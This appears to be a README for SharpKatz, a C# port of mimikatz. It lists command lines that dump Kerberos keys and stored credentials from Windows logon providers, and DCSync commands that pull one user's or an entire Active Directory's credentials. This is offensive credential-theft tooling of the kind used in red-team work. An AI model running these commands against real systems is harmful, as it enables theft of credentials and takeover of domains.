Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
SharpKatz.exe --Command ekeys
list Kerberos encryption keys
SharpKatz.exe --Command msv
Retrive user credentials from Msv provider
SharpKatz.exe --Command kerberos
Retrive user credentials from Kerberos provider
SharpKatz.exe --Command tspkg
Retrive user credentials from Tspkg provider
SharpKatz.exe --Command credman
Retrive user credentials from Credman provider
SharpKatz.exe --Command wdigest
Retrive user credentials from WDigest provider
SharpKatz.exe --Command logonpasswords
Retrive user credentials from all providers
SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Dump user credential by username
SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Dump user credential by GUID
SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Export the entire dataset from AD to a file created in the current user's temp forder
This project depends entirely on the work of Benjamin Delpy and Vincent Le Toux on Mimikatz and MakeMeEnterpriseAdmin projects.
The analysis of the code was conducted following the example from this blog post by xpn.